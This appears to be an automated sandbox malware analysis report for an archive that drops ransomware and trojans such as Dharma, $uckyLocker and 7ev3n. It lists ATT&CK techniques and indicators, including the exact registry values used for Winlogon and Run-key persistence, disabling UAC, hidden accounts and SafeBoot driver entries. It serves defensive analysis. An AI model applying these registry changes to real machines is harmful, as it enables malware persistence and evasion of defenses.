8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

Resubmissions

18-07-2024 00:13

240718-ah91wawelp 10

18-07-2024 00:06

240718-ady3tayhqh 10

Analysis

max time kernel
861s
max time network
862s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
18-07-2024 00:13

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

EFI_[unknowncheats.me]_.zip
Size

22B
MD5

76cdb2bad9582d23c1f6f4d868218d6c
SHA1

b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256

8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512

5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Score

10^/10

defense_evasion evasion persistence privilege_escalation ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

Suspicious use of NtCreateProcessExOtherParentProcess 8 IoCs

Processes:

taskmgr.exe

description	pid	process	target process
PID 4960 created 1340	4960	taskmgr.exe	CookieClickerHack.exe
PID 4960 created 1340	4960	taskmgr.exe	CookieClickerHack.exe
PID 4960 created 3616	4960	taskmgr.exe	CookieClickerHack.exe
PID 4960 created 3616	4960	taskmgr.exe	CookieClickerHack.exe
PID 4960 created 3060	4960	taskmgr.exe	$uckyLocker.exe
PID 4960 created 3060	4960	taskmgr.exe	$uckyLocker.exe
PID 4960 created 3104	4960	taskmgr.exe	CookieClickerHack.exe
PID 4960 created 3104	4960	taskmgr.exe	CookieClickerHack.exe

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2996 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4072 attrib.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
2996	netsh.exe

pid	process
4072	attrib.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mssql.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ftefbvnfkmpdzbmx\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\ftefbvnfkmpdzbmx.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\fczpsxxewddbrmpnm\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\fczpsxxewddbrmpnm.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\crmmnrdsjcfppvsxi\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\crmmnrdsjcfppvsxi.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\kapoetvrnttmzg\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\kapoetvrnttmzg.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"	mssql.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Dharma.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation Dharma.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation	Dharma.exe

Executes dropped EXE 19 IoCs

Processes:

CookieClickerHack.exeYouAreAnIdiot.exeYouAreAnIdiot.exeYouAreAnIdiot.exeYouAreAnIdiot.exeYouAreAnIdiot.exeDharma.exenc123.exemssql.exemssql2.exeSearchHost.exeCookieClickerHack.exeCookieClickerHack.exe$uckyLocker.exe$uckyLocker.exeDharma.exeCookieClickerHack.exe7ev3n.exesystem.exe

pid	process
1252	CookieClickerHack.exe
4904	YouAreAnIdiot.exe
4064	YouAreAnIdiot.exe
2996	YouAreAnIdiot.exe
3108	YouAreAnIdiot.exe
3668	YouAreAnIdiot.exe
932	Dharma.exe
1876	nc123.exe
4912	mssql.exe
2044	mssql2.exe
4840	SearchHost.exe
1340	CookieClickerHack.exe
3616	CookieClickerHack.exe
4616	$uckyLocker.exe
3060	$uckyLocker.exe
1724	Dharma.exe
3104	CookieClickerHack.exe
1732	7ev3n.exe
4780	system.exe

Impair Defenses: Safe Mode Boot 1 TTPs 8 IoCs

defense_evasion

Safe Mode Boot

T1562.009

Processes:

mssql.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\FCZPSXXEWDDBRMPNM.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\crmmnrdsjcfppvsxi.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\CRMMNRDSJCFPPVSXI.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\kapoetvrnttmzg.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\KAPOETVRNTTMZG.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ftefbvnfkmpdzbmx.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\FTEFBVNFKMPDZBMX.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\fczpsxxewddbrmpnm.sys	mssql.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

SearchHost.exe

description ioc process

File opened (read-only) \??\D: SearchHost.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

145 raw.githubusercontent.com
146 raw.githubusercontent.com

description	ioc	process
File opened (read-only)	\??\D:	SearchHost.exe

flow	ioc
145	raw.githubusercontent.com
146	raw.githubusercontent.com

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

$uckyLocker.exe$uckyLocker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

3444 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3444	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1324	4904	WerFault.exe	YouAreAnIdiot.exe
4612	4064	WerFault.exe	YouAreAnIdiot.exe
1836	2996	WerFault.exe	YouAreAnIdiot.exe
2348	3108	WerFault.exe	YouAreAnIdiot.exe
4148	3668	WerFault.exe	YouAreAnIdiot.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "155"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe

Modifies registry class 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-47134698-4092160662-1261813102-1000\{54E2744F-D16B-42F7-B70D-86286CB7F2B0}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings	msedge.exe

NTFS ADS 8 IoCs

Processes:

msedge.exe7ev3n.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 167302.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 324659.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\AppData\Local\system.exe\:SmartScreen:$DATA	7ev3n.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 672833.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 702275.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 792627.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 502618.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 963901.crdownload:SmartScreen	msedge.exe

Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

SCHTASKS.exe

pid process

2228 SCHTASKS.exe

pid	process
2228	SCHTASKS.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exetaskmgr.exemsedge.exe

pid	process
536	msedge.exe
536	msedge.exe
4008	msedge.exe
4008	msedge.exe
3208	identity_helper.exe
3208	identity_helper.exe
2028	msedge.exe
2028	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3084	msedge.exe
3084	msedge.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
2156	msedge.exe
2156	msedge.exe
4960	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

taskmgr.exemssql.exemsedge.exe

pid process

4960 taskmgr.exe
4912 mssql.exe
4008 msedge.exe

pid	process
4960	taskmgr.exe
4912	mssql.exe
4008	msedge.exe

Suspicious behavior: LoadsDriver 32 IoCs

Processes:

mssql.exe

pid	process
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe
4912	mssql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs

Processes:

msedge.exe

pid	process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskmgr.exeAUDIODG.EXEmssql.exemssql2.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4960	taskmgr.exe
Token: SeSystemProfilePrivilege	4960	taskmgr.exe
Token: SeCreateGlobalPrivilege	4960	taskmgr.exe
Token: 33	2956	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2956	AUDIODG.EXE
Token: SeDebugPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeLoadDriverPrivilege	4912	mssql.exe
Token: SeDebugPrivilege	2044	mssql2.exe
Token: SeIncreaseQuotaPrivilege	1664	WMIC.exe
Token: SeSecurityPrivilege	1664	WMIC.exe
Token: SeTakeOwnershipPrivilege	1664	WMIC.exe
Token: SeLoadDriverPrivilege	1664	WMIC.exe
Token: SeSystemProfilePrivilege	1664	WMIC.exe
Token: SeSystemtimePrivilege	1664	WMIC.exe
Token: SeProfSingleProcessPrivilege	1664	WMIC.exe
Token: SeIncBasePriorityPrivilege	1664	WMIC.exe
Token: SeCreatePagefilePrivilege	1664	WMIC.exe
Token: SeBackupPrivilege	1664	WMIC.exe
Token: SeRestorePrivilege	1664	WMIC.exe
Token: SeShutdownPrivilege	1664	WMIC.exe
Token: SeDebugPrivilege	1664	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1664	WMIC.exe
Token: SeRemoteShutdownPrivilege	1664	WMIC.exe
Token: SeUndockPrivilege	1664	WMIC.exe
Token: SeManageVolumePrivilege	1664	WMIC.exe
Token: 33	1664	WMIC.exe
Token: 34	1664	WMIC.exe
Token: 35	1664	WMIC.exe
Token: 36	1664	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1664	WMIC.exe
Token: SeSecurityPrivilege	1664	WMIC.exe
Token: SeTakeOwnershipPrivilege	1664	WMIC.exe
Token: SeLoadDriverPrivilege	1664	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe
4960	taskmgr.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

mssql.exemssql2.exeSearchHost.exemsedge.exeLogonUI.exe

pid process

4912 mssql.exe
2044 mssql2.exe
4840 SearchHost.exe
4912 mssql.exe
4008 msedge.exe
4008 msedge.exe
3976 LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4008 wrote to memory of 4088	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4088	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4836	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 536	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 536	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
